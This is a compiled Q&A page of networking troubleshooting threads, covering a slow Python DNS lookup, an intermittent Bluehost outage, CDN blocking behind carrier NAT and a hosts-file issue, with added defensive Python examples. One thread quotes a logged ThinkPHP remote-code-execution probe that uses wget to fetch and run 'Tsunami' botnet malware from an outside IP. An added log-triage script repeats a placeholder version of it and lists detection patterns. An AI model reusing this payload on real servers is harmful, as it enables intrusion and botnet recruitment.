Windows DNS problem with Python socket.getaddrinfo() - python-3.x

I have DNS problems with my Python scripts, but not with network tools or browser on my Windows 10 desktop.
When running my scripts, every network request takes at least 5-10 seconds. Profiling with py-spy with the --idle flag identified socket.getaddrinfo() as the function most time is spent in. I tested in the Python REPL with the following command:
socket.getaddrinfo("example.org", 80, proto=socket.IPPROTO_TCP)
It took around 5-10 seconds to return. Setting fixed DNS server in my active network interface did change anything.
Rebooting fixes the problem and brings the response time down to below a second. But after keeping the computer up for some days, the problem returns.
It looks like socket.getaddrinfo hits some timeout and then resolves with the correct DNS.
nslookup works just fine. Response time in ms. Also internet surfing in browsers works just fine.
Any ideas where I could start to dig?

What are you trying to accomplish?
Resolving a domain name to an IP address?
Simply try:
socket.gethostbyname("example.com")
Check which DNS servers are configured (in cmd: ipconfig /all, DNS Servers category).
Try using a proprietary Python DNS client and see if the problem persists,
e.g. dnspython
(see this answer: Socket resolve DNS with specific DNS server)
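A way to narrow down the delay described in the question, as an added example that is not part of the original posts: it repeats the same socket.getaddrinfo() call once per address family and times each, so you can see whether the stall is tied to the unspecified-family lookup, to IPv4 or to IPv6. The helper names time_lookups and slowest are made up for this sketch.

```python
import socket
import time

FAMILIES = {
    "AF_UNSPEC": socket.AF_UNSPEC,  # what the call in the question uses by default
    "AF_INET": socket.AF_INET,      # IPv4 results only
    "AF_INET6": socket.AF_INET6,    # IPv6 results only
}


def time_lookups(host, port=80):
    """Resolve host once per address family; return timing, addresses and errors."""
    results = {}
    for name, family in FAMILIES.items():
        start = time.perf_counter()
        try:
            infos = socket.getaddrinfo(host, port, family=family,
                                       proto=socket.IPPROTO_TCP)
            addresses = sorted({info[4][0] for info in infos})
            error = None
        except socket.gaierror as exc:
            # A family with no usable answer is reported, not raised.
            addresses, error = [], str(exc)
        results[name] = {
            "seconds": time.perf_counter() - start,
            "addresses": addresses,
            "error": error,
        }
    return results


def slowest(results):
    """Name of the address family whose lookup took longest."""
    return max(results, key=lambda name: results[name]["seconds"])


if __name__ == "__main__":
    report = time_lookups("example.org")
    for name, r in report.items():
        print(f"{name:9} {r['seconds']:6.2f}s  {r['addresses'] or r['error']}")
    print("slowest:", slowest(report))
```

Run it once right after a reboot and again when the slowdown is back, then compare the per-family timings.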

Related

Python 3 http.server - A strange IP address tried to connect my server

Several minutes ago, I ran a python-based server to share a few files with my friend. I disabled the windows firewall so that he could connect and download the files. When someone tries to connect the server, Python shows their IP address and the path they requested.
Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how did this person know my IP address and try to connect to my computer? I've only shared it with my friend on WhatsApp.
I've done this many times before and this is the first time something like this has happened.
61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -
There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time these kinds of scripts are trying to get reverse shells in an attempt to build botnet armies. There are also some reports of Windows machines connected to the internet being hacked before the OS finishes its installation.
This is a pretty common hacking technique. Hackers will scan the internet using seemingly random IP addresses (and happened to pick yours out) and look for open ports (usually common ports like 22, 80 and 443) and run a bunch of common exploits in efforts to gain control over the machine.
Many of the botnets were created by just attacking random IP addresses hoping that they would have a router with the default username and password still set, or with out-of-date software with known exploits.
In your case it looks like they were hoping that your web server was running a certain combination of PHP software. Your IP address was probably one of thousands that they ran the same query against.
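To recognise this kind of drive-by probe in your own http.server output, here is an added example (not part of the original posts) that parses log lines in the format shown in the question and groups command-execution indicators by client IP. The sample lines are constructed, with documentation-range addresses and a placeholder URL, and the indicator list is an assumption you would tune for your own logs.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in http.server's log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.20 - - [06/Jan/2019 01:20:03] "GET /holiday.zip HTTP/1.1" 200 -
203.0.113.9 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://payload.invalid/x -O /tmp/.x; chmod 777 /tmp/.x' HTTP/1.1")
203.0.113.9 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://payload.invalid/x -O /tmp/.x; chmod 777 /tmp/.x' HTTP/1.1" 400 -
198.51.100.20 - - [06/Jan/2019 01:31:40] "GET /notes.txt HTTP/1.1" 200 -
"""

# Assumed indicator set: things a file-sharing server never legitimately receives.
INDICATORS = {
    "php_code_exec": re.compile(r"\b(?:shell_exec|call_user_func_array|passthru|proc_open)\b", re.I),
    "downloader": re.compile(r"\b(?:wget|curl)\s+\S*https?://", re.I),
    "make_executable": re.compile(r"\bchmod\s+[0-7]{3,4}\b", re.I),
    "tmp_drop": re.compile(r"/tmp/\S+"),
    "php_on_static_server": re.compile(r"\.php(?:\?|\s|$)", re.I),
}
# "<ip> - - [<timestamp>] <rest>" covers both request lines and "code 400" lines.
LINE = re.compile(r"^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] (?P<rest>.*)$")


def triage(log_text):
    """Map each client IP to the sorted indicator names seen in its requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        request = unquote(m["rest"])  # payloads may arrive percent-encoded
        for name, pattern in INDICATORS.items():
            if pattern.search(request):
                hits[m["ip"]].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}


if __name__ == "__main__":
    for ip, names in triage(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```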
This is why you shouldn't disable your firewall: the average time it takes from going online without protection to someone trying to crack into your system is at best minutes.
Instead, you should find out the IP of your friend, and just allow that single IP. And unless your friend has a static IP address, remove that allow after they're done testing, because someone else could get that address later.
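An application-level version of the "allow that single IP" advice above, as an added example that is not part of the original answers: a Python http.server that drops connections from any address outside an allowlist before a request is parsed. The address 203.0.113.7 and the folder name shared are assumptions; this complements the firewall rule the answer describes rather than replacing it.

```python
import ipaddress
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Assumption: your friend's current public address (constructed, documentation range).
ALLOWED = ["203.0.113.7/32"]


def is_allowed(client_ip, allowed=ALLOWED):
    """True only if client_ip parses and falls inside one of the allowed networks."""
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False
    # Dual-stack sockets report IPv4 peers as ::ffff:a.b.c.d; unwrap them.
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:
        addr = mapped
    return any(addr in ipaddress.ip_network(net) for net in allowed)


class AllowlistHTTPServer(ThreadingHTTPServer):
    """Closes connections from unlisted peers before any request is read."""

    def verify_request(self, request, client_address):
        ok = is_allowed(client_address[0])
        if not ok:
            print(f"dropped connection from {client_address[0]}")
        return ok


def serve(directory, port=8000):
    """Serve only the given directory, and only to allowlisted clients."""
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    with AllowlistHTTPServer(("0.0.0.0", port), handler) as httpd:
        httpd.serve_forever()


if __name__ == "__main__":
    serve("shared")  # hypothetical folder holding only the files to share
```

Remove the entry from ALLOWED once the transfer is finished, for the same reason the answer gives for removing the firewall rule.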

This webpage is not available, The connection to xxx.domain.pl was interrupted, only first pageload

I'm experiencing odd error while trying to load my web page in browser. When I haven't opened it for some period of time and then try to open it just by typing address in browser and clicking enter:
1) The page doesn't load - browser message that it is not available, connection to .... was interrupted
(in Opera there is also info about proxy, network... I can paste it later when the error repeats again)
2) after refreshing, loading page again it works ok (without any problem)
My web page address is crib.pl and subdomains niemiecki.crib.pl, hiszpanski.crib.pl
It is important to note that when I try to load, for example, niemiecki.crib.pl for the first time, it doesn't open, but opening hiszpanski.crib.pl next works normally.
Some additional info:
- hosting is at Bluehost (Utah, USA)
- I'm trying to access this from (Poland, Europe)
- website is on drupal
- it has worked for more than 4 years without problems on this server
- it worked even a week ago without a problem and it hasn't worked since 31 December 2014
- Bluehost support doesn't have any idea, they say it works perfectly 1-to-1 cases (no problem)
(If you can, check it and post your country and whether or not you are experiencing a similar problem)
- I haven't modified anything on the web page (problem just happens without my interaction)
- Google crawlers seem to have some problems with accessing the robots.txt (sth like that) file
- domain is hosted by company in Poland (crib.pl) and this domain is set using external DNS to bluehost.com servers
Any help would save my life, I've been experiencing about a 50% drop in earnings since this problem started!
Opera message:
"
This webpage is not available
The connection to crib.pl was interrupted.
Check your internet connection.
Check any cables and reboot any routers, modems, or other network devices you may be using.
Allow Opera to access the network in your firewall or antivirus settings.
If it is already listed as a program allowed to access the network, try removing it from the list and adding it again.
If you use a proxy server...
Check your proxy settings or contact your network administrator to make sure the proxy server is working. If you don't believe you should be using a proxy server: Go to Applications > System Preferences > Network > Advanced > Proxies and deselect any proxies that have been selected.
"
There is definitely something wrong with the Bluehost box (i.e. the server behind the IP address 66.147.244.170). From Australia at 2015-Jan-05 12:19:36 UTC, I was able to reproduce a "Connection reset by peer" error just using curl, which corresponds to the browser message "connection to .. was interrupted".
Other times, it just hangs while trying to establish a connection.
In addition, other servers on the same subnet also owned by Bluehost appear to be working fine.
For example:
$ telnet 66.147.244.22 80
Trying 66.147.244.22...
Connected to 66-147-244-22.unifiedlayer.com.
Escape character is '^]'.
^]
telnet> q
Connection closed.
This tells me that it is not a routing problem on the public Internet either.
Also, when I tried again after a while, it succeeded in opening a connection. So, you're right that the problem is intermittent.
In other words, I think the issue lies with this particular Bluehost box. It could be one of the following causes:
OS is out of file descriptors
Apache or whatever mail server is too slow to service requests and therefore has maxed out its listen backlog
other server resource limits (perhaps memory) or network equipment issue localized to the hosting environment
Best to check with Bluehost again. My guess is that one of the other tenants sharing that server is getting heavily loaded periodically.
Yes, as I thought before, the problem was with the Bluehost box.
Now it seems that the problem has been fixed. Here's what I have done:
1) I upgraded my Bluehost account (standard shared to pro shared)
I did this because I wanted to change the IP address and Bluehost box without changing the crib.pl
domain's external DNS server configuration (it is set to Bluehost)
I also wanted automatic migration, because I don't have much time now.
2) After the upgrade I got a new IP address and a new Bluehost box, but it also didn't work correctly
3) So I switched on the dedicated IP option, and about 6 hours later, when the dedicated IP had propagated properly, the website seems to work correctly again (one problem: it cost me about 120$ for the next year and shortened my plan by 1 year compared to before)
4) The most frustrating issue was the approach of Bluehost technical support, which wasn't eager to help me in any way even though the problem was in their server configuration, not my code!

Can't access cloudfront and fastly files, web sites not loading

Note: this problem is independent of wire/wireless, iPad (with Google DNS)/Linux/Windows
I can't access several sites including stackoverflow (cdn.sstatic.net), aws.amazon.com (d36cz9buwru1tt.cloudfront.net), heroku, github etc for 3 days from Turkey with ISP Superonline.
When I try to enter aws.amazon.com, browser downloads html and some images properly but can't download some of them, those hosted on d36cz9buwru1tt.cloudfront.net or subdomains like that.
Chrome says several images from this subdomain are pending. So the web page loading never finishes.
I can't access http://d36cz9buwru1tt.cloudfront.net, it keeps loading for a while (30 sec to minutes). But when I use proxy over Amsterdam, it loads immediately.
Without proxy, I can get its IP with ping:
64 bytes from server-54-240-162-83.fra6.r.cloudfront.net (54.240.162.83): icmp_req=1 ttl=53 time=58.2 ms
While writing these, the previous URL became available after several hours and now github.com can't be accessed due to css files on its CDN: https://github.global.ssl.fastly.net/assets/github2-f227c0e7c55002ba0645fc8d3761d00bce36e248.css
$ wget https://github.global.ssl.fastly.net/assets/github2-f227c0e7c55002ba0645fc8d3761d00bce36e248.css
--2013-11-19 21:39:32-- https://github.global.ssl.fastly.net/assets/github2-f227c0e7c55002ba0645fc8d3761d00bce36e248.css
Resolving github.global.ssl.fastly.net (github.global.ssl.fastly.net)... 185.31.17.184, 185.31.17.185
Connecting to github.global.ssl.fastly.net (github.global.ssl.fastly.net)|185.31.17.184|:443... connected.
...
...
waits but no response.
What could be the cause of this problem? My ISP did not help.
UPDATE: Changing my IP has solved the problem. Seems like someone using that IP before me got banned by Cloudfront.
I also had the exact same problem. Changing the DNS solved the issue. For me Coursera wasn't opening, and neither was 9GAG.
I changed my default DNS server provided by my ISP to the ones given by Google, i.e.
8.8.8.8 and 8.8.4.4
I hope this solves your issue as well.
It seems there are a lot of problems with some ISPs and DNS resolution on CloudFront. See this https://forums.aws.amazon.com/thread.jspa?messageID=263168
Have you tried to change your DNS?
I also have the exactly same problem; same situation as you.
I think we really experience exactly the same. (but for me happen just today)
I first noticed problem on cloudfront then fastly then I can connect to cloudfront but fastly.
To answer your question I have a possible speculation about the root of the problem.
However, if this speculation is true the issue can't be solved on our end.
I think it's because of LSN (or NAT444, CGN) that is installed in the ISP network.
(ISPs don't want customers to notice this change.)
To check if this speculation is plausible, please check your modem/router.
If the IP address received from the ISP is in the block 100.64.0.0/10,
then that should explain the phenomenon.
My ISP recently deployed LSN shortly before this problem arose.
I think the IP address pool in the LSN is too small (poorly deployed by the ISP), so too many users share the same IP address.
This causes CDN networks to think they are getting a DoS attack from a particular IP address.
Then the CDN networks will temporarily block (or null route) the LSN IP address.
Some notes: I'm sure this is not about the DNS, because Fastly deploys a trick called "round robin DNS" to use with "client retry", and I tried connecting to more than one IP address from Fastly and also checked that the values (all A records received) are correct.
To work around the issue you can set up a SOCKS proxy on a VPS and write a PAC script to redirect some traffic through the proxy.

Domains not loading - server working fine...any ideas?

I run a high volume website and since yesterday it's not working.
My server (for example) 100.0.0.1 is working fine, I can access WHM etc, rootssh no problem....
Yet none of the domains are working, they say cannot find page.
I have my name server setup at Godaddy using domainname.com
Pointing to 3 IPS, 100.0.0.1, 100.0.0.2, 100.0.0.3
All my domains then have ns1.domainname.com, ns2.domainname.com, ns3.domainname.com
As their Nameserver entries.
This was working fine yesterday, now...nothing.
Any ideas on what I can do? Troubleshoot.
Thank you, I am losing a lot of trade as I run a high-traffic eCommerce website, so would like to get this fixed as soon as possible.
Have you tried using the IP of the server instead of the domain name? Could rule out a DNS issue. You said you can gain root access fine.
Have you checked your firewall to ensure the correct ports are still open?
You can run a netstat command to check what type of traffic is occurring.
Run this command and then try to access the domain or IP to see if the connection is established or if the service is listening. (watch -n 1 netstat -nat)

Host file set, ping goes 127.0.0.1, but in browser URL still goes out to web?

Having some issues running my code locally.
I have my hosts file set up like this:
127.0.0.1 ryan.local.myappname.com
If I ping that URL it kicks back from 127...
but if I browse there in Firefox or IE it takes me to an old version of the site that is currently live instead of taking me to the local one...
I am running Windows 7
Any ideas?
copied: https://serverfault.com/questions/65903/host-file-set-ping-goes-127-0-0-1-but-in-browser-url-still-goes-out-to-web
A common reason for this problem is that you're using a proxy that does the DNS resolving for you. This way your browser never tries to resolve the host name, but simply passes it on to the proxy, which of course doesn't use your host file entry.
Answer per serverfault:
ipconfig /flushdns
Worked like a charm.
